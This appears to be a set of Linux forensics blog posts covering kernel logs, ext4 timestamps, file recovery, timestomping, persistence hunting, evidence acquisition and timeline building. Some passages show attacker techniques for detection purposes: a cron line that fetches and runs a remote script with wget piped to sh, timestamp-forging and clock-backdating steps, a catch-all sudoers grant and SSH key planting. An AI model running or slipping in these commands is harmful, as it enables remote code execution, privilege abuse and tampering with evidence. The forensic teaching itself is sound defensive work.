Tip: Watch Those Binary Logs Files like wtmp, btmp, and utmp are not plain-text , so don’t expect to read them with cat. Either use the right commands (last, lastb, who, etc.) or open them in a hex editor when you’re in full forensic mode. --------------------------------------------------------------------------------------- Let’s talk about something super important but often overlooked — kernel logs in Linux . 
These logs are goldmines when it comes to diagnosing system-level problems like driver issues, boot errors, or hardware failures. But if you're like most people, kernel logging might feel a bit messy because of the variety of tools and file paths involved across distros. So, let's break it all down in plain language. 🧠 First Things First — What’s dmesg All About? The dmesg command is your go-to tool when you want to see what the Linux kernel has been up to — especially right after booting. It shows stuff like: Hardware detection Driver loading Device initialization (like USBs, disks, network interfaces) Boot-time errors Basically, if something is going wrong at the very core of your OS — this is where you'll see the first red flags. 🔧 How to Use It? Just pop open a terminal and run: dmesg You’ll see a big wall of text. You can pipe it to less or grep for easier viewing: dmesg | grep -i error Now here’s the catch: this output comes from the kernel ring buffer — which is in memory. That means once the system reboots, poof — it’s gone unless you’ve saved it. 📁 But Wait — Where Is This Stuff Saved? On some distros, it actually is saved! 🗂️ /var/log/dmesg (Only on Some Systems) This file captures the output of dmesg from the last boot and stores it permanently. You can just run: less /var/log/dmesg But don’t count on it being available on all systems. For example: Debian/Ubuntu: You’re likely to find it. Fedora/RHEL/Rocky: Nope. They use journald instead (more on that in a sec). 📚 Enter /var/log/kern.log — The Persistent Hero Now this one’s interesting. The kern.log file contains all kernel messages — just like dmesg — but it sticks around even after rebooting. That means you can go back and check what the kernel was doing a week ago if your system started acting weird after an update or new hardware installation. View it like this: less /var/log/kern.log 🕒 Bonus: Time Stamps Unlike the raw dmesg output that shows uptime seconds (like [ 3.421546]), the messages in kern.log come with real human-readable timestamps , making it way easier to match with user events. 🧰 What About Fedora, RHEL, Rocky Linux? Alright, now let’s talk Fedora-style distros . They’ve moved away from traditional log files and now rely heavily on systemd's journald service . So files like /var/log/kern.log or /var/log/dmesg? You won't find them here. Instead, everything is logged into the system journal . ✅ How to View Kernel Logs? journalctl -k That gives you only kernel logs from the journal. Super clean, super easy. You can also use filters like: journalctl -k --since "2 days ago" --------------------------------------------------------------------------------------- 💾 Persistent vs Non-Persistent Logs (This Is Crucial!) Systemd-based distros can either store logs in memory (volatile) or on disk (persistent). Whether or not your logs survive reboot depends on how journald is set up. If logs are stored in /var/log/journal, they’re persistent . If not, and only in /run/log/journal, they’re gone after reboot . So if you're doing forensics on a deadbox, you’d better hope /var/log/journal exists. --------------------------------------------------------------------------------------- 💀 Deadbox Log Hunting Tips If you're working on a dead system and trying to dig into what happened before it went down: Mount the disk using a live CD or forensic OS. Navigate to /var/log/journal/ if it exists. Use journalctl --directory=/mount/path/var/log/journal to view the logs. If nothing's there? 
You're kinda outta luck unless you've got other artifacts like /var/crash/, old syslog exports, or even swap memory to analyze. --------------------------------------------------------------------------------------- 🔚 Final Thoughts Whether you’re on a live system , doing forensics , or trying to fix a misbehaving server, don’t forget: Logs don’t lie — you just need to know where they’re hiding. --------------------------------------Dean------------------------------------------
- Linux File System Analysis and Linux File Recovery: EXT2/3/4 Techniques Using Debugfs, Ext4magic & Sleuth Kit
When you're digging into Linux systems, especially during live forensics or incident response, understanding file system behavior is crucial. The ext4 file system is commonly used, and knowing how to read file timestamps properly can give you a solid edge in an investigation. Let's break it down in a very real-world way.
🔹 1. Basic ls -l — Let’s Start Simple
When you run: ls -l
You get a list of files along with a timestamp. That timestamp? It’s the modification time (mtime). That’s the default. If you're like me and wondering, "What if I want to see when a file was last accessed or changed in metadata?", then you’ve got options.
🔹 2. Customize the Time Display (atime, ctime, etc.)
Use --time= to get the info you care about:
ls -l --time=atime # Shows last access time
ls -l --time=ctime # Shows inode change time
Note: ctime is not "creation time" (confusing, I know). It's the time when metadata (permissions, ownership, etc.) changed. Want to know what time options ls supports? Just check: man ls
🔹 3. Can We See File Creation Time on ext4?
Now here’s where it gets interesting — and a bit annoying. ext4 can support birth time (aka creation time), but not all Linux distros expose it by default via normal tools. Some versions of ls, stat, or even the filesystem itself may not record it. So how do we go deeper? That’s where the magic of debugfs comes in.
🔹 4. stat Command — Detailed File Info
Quick and handy: stat <filename>
You’ll see Access, Modify, Change times and creation time as well. But again, sometimes no creation time. Sad life 😅.
🔹 5. Using debugfs to Dig Deeper (Finding Birth Time or Inode Info)
When you’re doing live response and the system won’t give you birth/creation time using stat, this is your go-to:
sudo debugfs -R "stat /path/to/file" /dev/sdX
⚠️ You need the device name where the file system is mounted. How to find the device name? Use: df or df -h
Sometimes you might find something like /dev/sdc or /dev/mapper/ubuntu--vg-root if LVM is used. Also check /etc/fstab: cat /etc/fstab
This shows all persistently mounted devices, useful when the system uses LVM or /dev/mapper. Sometimes it’ll look like: /dev/disk/by-id/dm-uuid-LVM-...
✅ Example Use Case:
Let’s say I want to check creation time for /var/log/syslog. Run: sudo debugfs -R "stat /var/log/syslog" /dev/sdc
Boom! You'll now see: Inode, Size, Access time, Modify time, Change time, Creation time (if available!)
This is not the same stat command we used earlier. This one is a debugfs internal command.
🔹 6. Using debugfs in Interactive Mode
You can drop directly into debugfs with: sudo debugfs /dev/sdc
Once inside, you’re in a shell-like environment. Just run: stat /home/akashpatel/arkme
No need for -R here — you're already inside.
🔹 7. Want Inode Number First?
Sometimes, you want to grab the inode of a file before using debugfs. You can do this: ls -i /home/akashpatel/arkme
Now if you’ve got an inode like 123456, and you're inside debugfs, just run: stat <123456>
Or even: cat <123456>
(Yeah, cat also works in debugfs!)
🔹 Pro Tips:
Always double-check you’re using the right device — especially with forensic images or LVM setups.
debugfs is super powerful, but read-only usage is safest in live forensics (avoid writing to the file system!).
If you get errors running debugfs, make sure the device isn't actively in use or try accessing a mounted image instead.
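One more shortcut worth knowing: on reasonably recent GNU coreutils, with a kernel that supports statx, plain stat can print the birth time directly, no debugfs needed. A small sketch, using /var/log/syslog purely as an example path:
stat -c 'Birth: %w | Change: %z | Modify: %y | Access: %x | %n' /var/log/syslog
If Birth shows "-", the filesystem or tooling simply isn't exposing crtime, and you fall back to the debugfs approach above.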
In a nutshell:
ls -l: mtime (default)
ls -l --time=atime: Access time
ls -l --time=ctime: Metadata change time
stat <file>: mtime, atime, ctime, crtime (sometimes)
debugfs -R "stat <file>" /dev/...: Shows all 4 timestamps including birth time (if supported)
debugfs (interactive): Explore with inode numbers, use stat, cat, etc.
-------------------------------------------------------------------------------------------------------------
Let's suppose you accidentally delete a super important file on a Linux system running an ext2/ext3/ext4 filesystem. The panic hits, right? But don’t worry—I’ll walk you through how to recover it using a mix of tools like debugfs, ext4magic, and Sleuth Kit.
🧰 1. Recover Deleted Files Using debugfs (Works Best on EXT2)
If the filesystem is ext2, then debugfs is your best buddy. It's got this neat command called lsdel that lists recently deleted files.
🔧 Basic Workflow
Launch debugfs: sudo debugfs /dev/sdX
Replace /dev/sdX with your actual device (e.g., /dev/sdc).
List deleted files: lsdel
Or: list_deleted_inodes
You’ll get inode numbers of deleted files. Pick the one you want.
View inode details: stat <inode>
Preview content (yes, you can peek!): cat <inode>
Recover the file: dump <inode> /desired/output/path/filename
💡 Heads-up: This method is mostly for ext2 filesystems. Why? Because ext3 and ext4 zero out the inode's block pointers after deletion, which makes direct recovery much harder.
-------------------------------------------------------------------------------------------------------------
🧠 2. Recovery on EXT3 and EXT4 (Using Journal + ext4magic Tool)
Now here’s where it gets a bit more interesting. With ext3/ext4, things aren’t that simple because once a file is deleted, the inode is wiped out. But all hope isn’t lost—we go after the journal.
🔒 Journal’s Inode is Always 8
Yup. To grab the journal:
debugfs /dev/sdc
dump <8> /path/to/save/journal.dump
🚀 Use ext4magic for Real Recovery
This tool is specially made to deal with journal-based recovery. Install it if you haven’t: sudo apt install ext4magic
🛠️ Basic Command: sudo ext4magic /dev/sdc -j /path/to/journal.dump -m -d /path/to/recovery_folder
Flags explained:
-j: Path to journal dump file
-m: Recover ALL deleted files
-d: Where to store recovered files
-a or -b: Time-based filtering (after/before a specific time)
🎯 Example: Recover files deleted in the last 6 hours
ext4magic /dev/sdc -a "$(date -d "-6hours" +%s)" -j journal.dump -m -d ./recovered
(Swap "-6hours" for "-7days" or any other window you need.)
💬 This gives you super fine control over what to recover. It’s way better than randomly guessing.
-------------------------------------------------------------------------------------------------------------
🔍 3. Sleuth Kit Magic – Inspect and Recover Like a Forensics Expert
If you’re digging into a disk image, maybe from a compromised system or raw forensic capture, you’ll want to mount it and go deeper.
🧱 Mount the Image (Linux or WSL)
sudo mkdir /mnt/test
sudo mount -o ro,loop /path/to/linux.raw /mnt/test
Now run: df
Note down the mounted device name (e.g., /dev/loop0 or /dev/sdc).
🔎 Key Sleuth Kit Commands
1. fsstat – Filesystem Overview
sudo fsstat /dev/sdc
2. fls – List Deleted Files (and More!)
sudo fls -r -d -p /dev/sdc
-r: Recursive
-d: Deleted entries
-p: Show full path
3. istat – Inode Metadata
sudo istat /dev/sdc <inode>
4. icat – View File Content by Inode
sudo icat /dev/sdc <inode>
Perfect for checking the content of deleted files even if they don’t show up in the normal file tree.
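Putting those three together is usually how an actual recovery goes. A minimal sketch (the device /dev/sdc, the filename secret.txt, and inode 123456 are all hypothetical stand-ins):
sudo fls -r -d -p /dev/sdc | grep secret.txt      # find the deleted entry and note its inode number
sudo istat /dev/sdc 123456                         # confirm size, timestamps, and whether data blocks are still listed
sudo icat /dev/sdc 123456 > ./secret_recovered.txt
Keep in mind the ext3/ext4 caveat from earlier: if the inode's block pointers were zeroed, icat may return nothing, and you are back to journal analysis or carving.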
🌀 Filesystem Journal Analysis with Sleuth Kit
Sometimes, you want to peek into journal entries directly. Here’s how:
1. jls – List Journal Blocks
sudo jls /dev/sdc | more
2. jcat – View Journal Block Content
sudo jcat /dev/sdc <journal_block>
(Use a block number taken from the jls output.) This is raw, low-level stuff—but crucial when traditional recovery methods fall short.
-------------------------------------------------------------------------------------------------------------
📦 Bonus: File Carving with photorec
If you’re like "Just give me all the lost files!", then photorec is your hero.
Install it: sudo apt install testdisk
Run it: sudo photorec
Just point it to your image or device, choose the file types you want to recover, and it does the rest. It’ll carve out all files it finds—even if directory info is gone. (Very simple: just follow the prompts it shows.)
🔍 Final Tip: Search Within Recovered Files
Once you recover everything, you might want to search for a specific string, like an IP address or username: grep -Rail "192.168.1.10" ./recovered
The -a (bundled into -Rail) treats binary files as text, which is super helpful during deep dives.
✅ Wrapping Up
So, whether you’re on a forensic case or just accidentally nuked your presentation file, these tools have your back. Just remember:
Use debugfs for ext2.
Use ext4magic + journal for ext3/ext4.
Use Sleuth Kit for image-based investigation.
And photorec when you’re ready to say "Recover ALL the things!"
-------------------------------------Dean---------------------------------------------------
- Timestomping in Linux: Techniques, Detection, and Forensic Insights
------------------------------------------------------------------------------------------------------ Before we dive into timestomping on Linux, a quick note: I've already written a detailed article on timestomping in Windows , where I covered what it is, how attackers use it, and most importantly— how to detect it effectively . If you're interested in understanding Windows-based timestomp techniques and detection strategies, make sure to check out the article linked below: 👉 https://www.cyberengage.org/post/anti-forensics-timestomping Now, let’s explore how timestomping works on Linux systems and what you can do to uncover such activity. ------------------------------------------------------------------------------------------------------ Let’s talk about something that often flies under the radar in Linux investigations— timestomping . If you’re into forensics or incident response, you’ve probably come across files where the timestamps just don’t seem right. Maybe a malicious script claims it was modified months before the attack even happened. Suspicious, right? That’s timestomping in action. 🔧 So, What Exactly Is Timestomping? Timestomping is a sneaky little trick attackers use to manipulate file timestamps in order to hide their activities. Basically, they change the "last modified," "last accessed," or even "created" dates of files, so things don’t look out of place during an investigation. Here are the four main timestamps you’ll see in Linux: atime – last time the file was accessed mtime – last time the content was modified ctime – last time metadata (like permissions) changed crtime – file creation time (only visible on some filesystems like ext4, and not easily accessible) The goal is simple: blend in . If the file looks like it’s been sitting around for months, maybe you won’t look at it twice. 🛠️ The Classic Way: Using touch in Linux The most common and dead-simple way to timestomp in Linux is with the touch command. 🧪 Basic Syntax: touch -t [YYYYMMDDhhmm.ss] file 🎯 Some Practical Examples: Set a custom access & modification time: touch -t 202501010830.30 malicious.sh Change only the access time: touch -a -t 202501010101.01 report.log Change only the modification time: touch -m -t 202501010101.01 report.log ❗ Important Note: touch cannot change ctime or crtime . That’s metadata Linux protects more tightly. ------------------------------------------------------------------------------------------------------------- 🧠 Pro Trick: Copy Timestamps from Another File Want to make one file mimic another? touch -r /home/akash/legitfile suspiciousfile Now suspiciousfile will have the same access and modification times as legitfile. Handy for blending in! 👀 But... Can We Detect This? Yes. Even though timestomping is subtle, there are a few tells if you know what to look for. 🕵️♀️ 1. Subsecond Precision = 0? Run stat on the file: stat suspiciousfile If you see nanoseconds like .000000000, it might’ve been altered using touch—since manual timestamps usually don’t include fine-grained precision. ----------------------------------------------------------------------------------------------------------- ⏳ System Time Manipulation: Another Sneaky Method Here’s another trick some attackers use—they change the system clock to backdate files. 
🧪 How it Works: Turn off NTP (time syncing): sudo timedatectl set-ntp false Set a fake date/time: sudo date -s "1999-01-01 12:00:00" Create or drop your malicious files: touch payload.sh Restore the actual time: sudo timedatectl set-ntp true Now those files look like they were created in 1999—even though they were dropped minutes ago. 🔍 Real-World Detection Tips Here’s how we can catch these kinds of timestamp games: 📋 1. Command Monitoring Keep an eye on suspicious commands in your logs: touch -t touch -r date -s timedatectl hwclock 🧭 2. Timeline Inconsistencies Does a file’s mtime predate surrounding system events? Is ctime suspiciously newer than atime/mtime ? Are there clusters of files all modified at the same weird timestamp? Use stat to dig into these or check timelines with forensic tools (more on that below). 🛠️ Forensic Tools That Can Help Here are some tools I often use when digging into possible timestomping: auditd – Can log file events and command execution (like touch, date) Sysmon for Linux – A great way to track suspicious process activity Plaso / log2timeline – My go-to for creating timelines and spotting weird timestamp gaps Velociraptor – Awesome for live hunting across multiple systems Eric Zimmerman's Tools – These are more for Windows, but worth mentioning if you’re working across platforms or with NTFS images 🔚 Final Thoughts Timestomping isn’t flashy—but it’s effective. That’s what makes it dangerous. A single altered timestamp can throw off your entire investigation if you’re not paying attention. But once you know what to look for—whether it's zeroed-out nanoseconds, unusual ctime, or oddly-timed files—you can start to see through the smoke and mirrors. Stay curious, stay forensic. 🕵️♂️ ------------------------------------------------------------Dean--------------------------------------------
- Understanding Linux Service Management Systems and Persistence Mechanisms in System Compromise
Before I start, I have already touched on persistence mechanisms in the article (Exploring Linux Attack Vectors: How Cybercriminals Compromise Linux Servers). If you want, you can check it out at the link below:
https://www.cyberengage.org/post/exploring-linux-attack-vectors-how-cybercriminals-compromise-linux-servers
---------------------------------------------------------------------------------------------------------
Understanding init.d and systemd
Service management in Linux has evolved significantly over the years, transitioning from traditional init.d scripts to the more modern systemd system. Both play crucial roles in starting, stopping, and managing background services (daemons), but they differ greatly in functionality, design, and usability.
init.d: The Traditional System
The init.d system has historically been the backbone of Linux service management. It consists of shell scripts stored in the /etc/init.d directory, each designed to control the lifecycle of a specific service.
Common Commands
Service management through init.d typically involves:
start – Launch the service
stop – Terminate the service
restart – Stop and start the service again
status – Check if the service is running
Limitations
Despite being widely used for years, init.d has several limitations:
Lack of standardization: Script behaviors can vary widely
No built-in dependency handling: Scripts must manually ensure other services are available
Slower boot times due to serial service initialization
Runlevels
Runlevels define the state of the machine and what services should be running:
0 – Halt
1 – Single user mode
2 – Multi-user, no network
3 – Multi-user with networking
4 – User-defined
5 – Multi-user with GUI
6 – Reboot
Management Tools
Depending on the Linux distribution:
Debian-based systems: Use update-rc.d to manage services
Fedora/RedHat-based systems: Use chkconfig for the same purpose
Script Location
/etc/init.d – Main location for service scripts
systemd: The Modern Standard
Introduced in 2010, systemd was designed to overcome the shortcomings of traditional init systems. Although initially controversial, it has since become the default service manager in most major Linux distributions.
Advantages
Parallelized startup for faster boot times
Dependency management between services
Integrated logging through the systemd-journald service
Standardized unit files replace disparate shell scripts
Unit Files
Instead of shell scripts, systemd uses declarative unit files to define how services should behave. These files can be of different types, such as:
*.service – Defines a system service
*.socket – Socket activation
*.target – Grouping units for specific states (like runlevels)
Unit File Locations
/etc/systemd/system/ – Local overrides and custom service files
/lib/systemd/system/ – Package-installed units (symlinked to /usr/lib/systemd/system on some distros)
/usr/lib/systemd/system/ – Units installed by the operating system
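To make "declarative unit files" concrete, here is a minimal, hypothetical pair; the names backup.service and backup.timer and the script path are invented for illustration, not taken from any real system:
# /etc/systemd/system/backup.service
[Unit]
Description=Nightly backup job

[Service]
Type=oneshot
ExecStart=/usr/local/bin/backup.sh

# /etc/systemd/system/backup.timer
[Unit]
Description=Run backup.service every night at 02:00

[Timer]
OnCalendar=*-*-* 02:00:00
Persistent=true

[Install]
WantedBy=timers.target
The timer half of this pair is exactly the mechanism discussed in the next section, which is also why reviewing /etc/systemd/system/ for unfamiliar unit files is a standard persistence check.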
2. Cron Jobs
Cron has long been the go-to tool for task scheduling in Unix and Linux environments. It's simple, reliable, and nearly universal.
Format: <minute> <hour> <day-of-month> <month> <day-of-week> <command>
minute (0 - 59)
hour (0 - 23)
day of the month (1 - 31)
month of the year (1 - 12)
day of the week (0 - 7; 0/7 = SUN)
( * ) = wildcard for any value
( , ) = list multiple values
( - ) = specify a range
( / ) = set increments within a range
How It Works
Cron jobs are defined in crontab files, which contain entries with six fields (five for the schedule, one for the command):
*/30 * * * * wget -q -O - http://<remote-host>/attack.sh | sh
This example runs a command every 30 minutes, silently fetching and executing a remote script — a classic example of how cron can be used maliciously.
Crontab Commands
Use these on a live system to inspect cron jobs:
crontab -l – Lists the current user's cron jobs
Cron File Locations
On Debian-based systems, cron-related files are typically found in:
/var/spool/cron/crontabs – per-user cron jobs
/etc/cron.d/, /etc/cron.daily/, /etc/cron.hourly/ – system-wide jobs
Why Use Cron?
Universally supported across Unix-like systems
Lightweight and straightforward
Does not require systemd
---------------------------------------------------------------------------------------------------------
Other Persistence Mechanisms
1. SSH as a Persistence Mechanism
SSH is one of the most reliable methods for attackers to maintain persistent access to a compromised system. There are two primary types of SSH authentication mechanisms: password-based and key-based. While password-based authentication is common, key-based authentication is often favored for persistence due to its robustness and ease of use.
How It Works: An attacker generates a public/private key pair on their own machine and then places the public key into the victim system's ~/.ssh/authorized_keys file. This allows them to authenticate to the system without needing to provide a password. Key-based SSH authentication is popular because once set up, the attacker can access the system remotely and continuously, even if the initial password is changed.
To check for this persistence, system administrators should audit the following locations:
/home/<user>/.ssh/authorized_keys
If an unfamiliar key is present, it could indicate unauthorized access.
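A quick, illustrative way to sweep those key files across all users in one pass (paths assume a standard layout; adjust for the system under review):

# List every authorized_keys file with ownership and modification time
find /root /home -maxdepth 3 -name authorized_keys -exec ls -la {} \; 2>/dev/null
# Print key fingerprints and comments so unfamiliar entries stand out
for f in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
  [ -f "$f" ] && echo "== $f" && ssh-keygen -lf "$f"
done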
2. Bash Configuration Files
Another method for creating persistence on a compromised system involves manipulating Bash configuration files. These files are typically executed when a user logs into a Bash shell, making them ideal for executing malicious scripts or commands automatically.
Key Files to Review:
Per-User Files:
/home/<user>/.bashrc
/home/<user>/.bash_profile
These files are executed each time a user opens a new terminal session. If an attacker has modified these files, they may have inserted a script to run malicious commands.
Other Per-User Bash Files:
/home/<user>/.bash_login
/home/<user>/.bash_logout
These files are also executed during user login and logout events. Any modifications should be carefully reviewed.
System-Wide Files:
/etc/bash.bashrc
/etc/profile
/etc/profile.d/*
The system-wide configuration files affect all users and may contain an attacker's code or scripts. Check the modification timestamps for any unexpected changes.
rc.local:
/etc/rc.local (if it exists)
This file, if present, runs scripts at system startup. While it might not exist by default on all systems, attackers can create it and add malicious commands to execute on boot.
3. udev Rules
udev is a device manager for the Linux kernel, responsible for managing device nodes in /dev. Attackers can exploit this by creating custom udev rules to trigger scripts based on hardware events, such as when a USB device is connected.
Key Files to Check:
/etc/udev/rules.d/
Review the files in this directory for any new or suspicious rules that might automatically execute a script when specific hardware is connected (e.g., a USB stick).
4. XDG Autostart
On systems with a graphical user interface (GUI), attackers may place scripts in directories related to XDG autostart. These scripts are automatically executed when the desktop environment starts, ensuring that malicious processes are launched every time the user logs in.
Key Files to Review:
System-Wide: /etc/xdg/autostart/
Per-User: /home/<user>/.config/autostart/
Any unfamiliar script in these directories could be a sign of persistent malware that runs whenever a user logs into the graphical environment.
5. Network Manager Scripts
The NetworkManager is responsible for managing network connections on Linux systems. Attackers can exploit this system by placing scripts in the NetworkManager's dispatcher directory to trigger actions during network events, such as when a specific network interface comes online.
Key Files to Review:
/etc/NetworkManager/dispatcher.d/
Scripts in this directory are executed whenever there are changes to network interfaces. Reviewing these files can reveal hidden scripts designed to execute during network events.
6. Modifying Sudoers for Elevated Privileges
Attackers often modify system configurations to ensure they can escalate privileges or maintain administrative access. One way to do this is by editing the sudoers file, which controls which users can run specific commands as root.
Example Sudoers Entry:
ALL ALL=(ALL:ALL) ALL
This entry allows any user to execute any command as any other user, including root. Attackers might add themselves to this file (or drop a file into /etc/sudoers.d/) to gain elevated privileges at will.
To check for unauthorized changes:
Use visudo to safely edit and inspect the /etc/sudoers file — it validates the syntax before saving.
Look for unusual users or commands in the sudoers file that could grant an attacker unrestricted access.
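Before wrapping up, here is a short, illustrative sweep that touches several of the locations above in one pass (the paths and the 14-day window are assumptions — tune them to the system under review):

# Validate sudoers syntax and look for overly broad grants
sudo visudo -c
sudo grep -RE '^[^#].*ALL=\(ALL' /etc/sudoers /etc/sudoers.d/ 2>/dev/null
# Persistence locations modified in the last 14 days
sudo find /etc/udev/rules.d /etc/NetworkManager/dispatcher.d /etc/xdg/autostart \
  /etc/profile.d /etc/rc.local -mtime -14 -ls 2>/dev/null
# Per-user shell startup files, with timestamps
ls -la /root/.bashrc /home/*/.bashrc /home/*/.bash_profile 2>/dev/null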
---------------------------------------------------------------------------------------------------------
Conclusion
Persistence is a critical phase of the attack lifecycle. A comprehensive security audit should include checking not just user accounts and SSH keys but also background services, startup scripts, scheduled tasks, and even device event triggers. By understanding the various persistence mechanisms — from traditional cron jobs to modern systemd timers — security professionals can more effectively hunt, detect, and respond to adversarial activity before it escalates into a bigger breach.
Key Takeaway: Effective persistence hunting means combining file integrity monitoring, service auditing, and user account audits into a regular security strategy.
------------------------------------------Dean----------------------------------------------------------
- Evidence Collection in Linux Forensics (Disk + Memory Acquisition)
Hey everyone! Today, we’re going to dive into a super important topic when it comes to Linux forensics — evidence collection .We’ll cover the classic tools like dd, dcfldd, and dc3dd, and also talk about modern memory acquisition methods and a very cool script called UAC . Let’s get right into it! Disk Imaging Tools: dd, dcfldd, and dc3dd When you're doing any kind of forensic work, the first rule is: capture an exact copy of the original data. In Linux, we have some legendary tools for this — and the best part? They're super easy to use once you get the hang of it! 1. dd – The Classic One You might think "dd" stands for something, but it actually doesn’t officially mean anything! It's a foundational UNIX tool for copying and converting files. Almost every Linux or UNIX-like system has it installed by default — making it a go-to for forensic investigators. It's often used to create bit-by-bit images of disks (i.e., exact copies). Example command: dd if=/dev/sda of=/path/to/image.dd bs=4M if = input file (your source device) of = output file (where you want to save the image) bs = block size (common values: 1M or 4M) Quick Tip: If you use /dev/sda as input, you capture the entire disk , including all partitions. If you use something like /dev/sda3, you're only capturing a specific partition . You can check your drives using: df -h And when naming your images, you'll often see extensions like .dd, .raw, or .img — they're all pretty standard. 2. dcfldd – Upgraded dd for Forensics dcfldd is basically an enhanced version of dd. Built by the U.S. Department of Defense Computer Forensics Lab (cool, right?). It adds features super useful for investigators: On-the-fly hashing (SHA256, SHA1, etc.) Status output (you see progress!) Splitting output into multiple smaller files. Example command: dcfldd if=/dev/sda of=/path/to/image.dd bs=4M hash=sha256 hashwindow=1G hash=sha256 will hash the image during acquisition. hashwindow=1G means it creates a hash after every 1GB chunk. 3. dc3dd – The Newest and Most Advanced dc3dd is another evolution, developed by the U.S. Department of Defense Cyber Crime Center (DC3) . It extends dcfldd with even more features : Better logging . Drive wiping and pattern writing (if needed). Detailed forensic reporting . Example command: dc3dd if=/dev/sda of=/path/to/image.dd log=/path/to/logfile.txt hash=sha256 hlog=/path/to/hashlog.txt This will: Capture the image. Log everything. Hash the image and save the hash to a separate file. Quick Summary: Tool Highlight dd Basic and universal dcfldd Adds hashing and better status reporting dc3dd Full forensic features with detailed logging Important: Across all three tools, if and of parameters stay the same — so once you learn one, you can easily switch to others! ------------------------------------------------------------------------------------------------------------ Linux Memory Acquisition: Capturing the Volatile Data Now, let’s move on to memory acquisition — another critical part of forensics. Memory holds running processes , network connections , encryption keys , and a lot of other sensitive stuff that disappears if the machine is powered off. Old School Method: In the early days, people used dd to dump memory from /dev/mem or /dev/kmem. But now, we have much better tools! Modern Tool: LiME (Linux Memory Extractor) LiME is specifically designed for live memory acquisition on Linux machines. 
You can find it here: 🔗 LiME GitHub Repository
It allows you to grab a memory image without shutting down the system — which is super important in real investigations.
Another Option: AVML (Acquire Volatile Memory for Linux)
Built by Microsoft, AVML is a super lightweight tool for memory captures on Linux. You can grab it here: 🔗 AVML GitHub Repository
------------------------------------------------------------------------------------------------------------
Extra Goodie: Using UAC Script for Artifact Collection!
If you've followed my macOS forensic series, you already know about UAC (Unix-like Artifacts Collector) — Good news: UAC supports Linux too! 🔗 UAC GitHub Repository
Here's how UAC works:
Enumerates available system tools.
Loads the uac.conf configuration file.
Builds a list of artifacts to collect.
Collects data (files, hashes, timestamps).
Creates a single output archive and hashes it.
Generates a full acquisition log.
Quick How-To for UAC on Linux
First, download and unzip UAC: tar zxvf uac.tar.gz
Inside the unzipped directory, you'll find multiple folders. The profiles folder is important — it contains YAML files that define what artifacts will be collected.
List available profiles: ./uac --profile list
Run UAC to collect everything (using the full profile): sudo ./uac -p full /path/to/output/folder
✅ Done! Now you have a full snapshot of the system's forensic artifacts.
What's inside the output?
A bodyfile — a text file with all the filesystem metadata (useful for timeline creation).
A Live_Response folder — containing processes, network connections, user accounts, and much more.
.stderr.txt files — if any command threw an error, it's logged here.
You can easily open and analyze these outputs on Linux or even Windows (with Notepad).
Wrapping Up
Evidence collection is the foundation of any good forensic investigation. Tools like dd, dcfldd, dc3dd, LiME, AVML, and UAC make it much easier to capture, preserve, and analyze critical data. Whether you're imaging a disk or grabbing volatile memory, remember: 👉 Accuracy and proper documentation are everything in forensics!
-----------------------------------------Dean------------------------------------------------------
- Creating a Timeline for Linux Triage with fls, mactime, and Plaso (Log2Timeline)
Building a timeline during forensic investigations is super important — it helps you see what happened and when. Today, I'll walk you through two simple but powerful ways to create timelines:
Using fls + mactime
Using Plaso / Log2Timeline (psteal, log2timeline, psort)
Don't worry — I'll explain everything in a very simple way, just like we're talking casually!
--------------------------------------------------------------------------------------------------------
🛠 Method 1: Using fls and mactime for Filesystem Timeline
First things first: Make sure the tool is installed. If not, you can install it easily: sudo apt install sleuthkit
The SleuthKit package gives you useful forensic tools like fls, mactime, icat, and more.
Step 1: Create a Body File with fls
Now, let's create the timeline body file:
fls -r -m "/" /mnt/c/Users/Akash's/Downloads/image.dd > /mnt/c/Users/Akash's/Downloads/timeline.body
What's happening here?
-r → Recursively walk through all directories and files.
-m "/" → Output in body (timeline) format, using / as the mount-point prefix for paths.
/mnt/.../image.dd → This is your disk image.
👉 Combining -r and -m "/", we tell fls: "Hey, start from root and go deep into everything inside."
Tip: Check your .body output — it should look clean and pipe-delimited (| characters). If it looks good, you're all set for the next step!
Step 2: Create a CSV Timeline with mactime
Now let's process the body file and create a readable timeline:
mactime -b /mnt/c/Users/Akash's/Downloads/timeline.body -d -y > /mnt/c/Users/Akash's/Downloads/timeline.csv
What do the options mean?
-b → Body file input.
-d → Output in delimited format (for spreadsheets).
-y → Print dates in ISO 8601 (year-first) format.
Optional: You can also specify a different time zone with -z (not recommended generally) — time zone names use the standard Region/City form:
mactime -b file.body -d -y -z Europe/Berlin
Or even specify a date range if you want:
mactime -b timeline.body -d -y 2025-04-02..2025-04-22 > timeline.csv
Step 3: Analyze Timeline
Use Timeline Explorer (Eric Zimmerman's free tool) to open and analyze your CSV file. It's one of the easiest ways to slice and dice timeline data visually! You can even turn on hidden columns like UID, GID, Permissions by right-clicking and choosing "Column Chooser."
Note: Since I'm running on an ext4 filesystem, I'm able to see creation/birth times too.
👉 Important: Using fls gives you a filesystem timeline only (file creation, modification, access, and metadata changes).
--------------------------------------------------------------------------------------------------------
🧠 Method 2: Creating Timeline Using Plaso (Log2Timeline)
If you want deeper timelines including event logs, browser history, and way more artifacts — use Plaso. I've already made two detailed guides on Plaso for Windows if you want to dive even deeper. Links below! 😉
Running Plaso/Log2Timeline on Windows
https://www.cyberengage.org/post/running-plaso-log2timeline-on-windows
A Deep Dive into Plaso/Log2Timeline Forensic Tools
https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools
Anyway, let's jump into it.
Option 1: Easy Way — Using psteal.py
Let's run everything in a single command:
psteal.py --source /mnt/c/Users/Akash's/Downloads/image.dd -o dynamic -w /mnt/c/Users/Akash's/Downloads/plasotimeline.csv
What this does:
Runs Log2Timeline + psort automatically.
Saves output as a nicely formatted CSV (plasotimeline.csv).
You can use .vmdk virtual machine images too:
psteal.py --source /path/to/your.vmdk -o dynamic -w /path/to/output.csv
Super clean and fast!
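Once the CSV is written, a quick keyword or date sweep from the shell can be a handy first pass before loading it into Timeline Explorer (the keyword and date below are made up for the example):

# Any hits on authorized_keys activity?
grep -i "authorized_keys" plasotimeline.csv | head
# Keep the header row plus everything from one day of interest
awk -F',' 'NR==1 || /2025-04-16/' plasotimeline.csv > slice.csv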
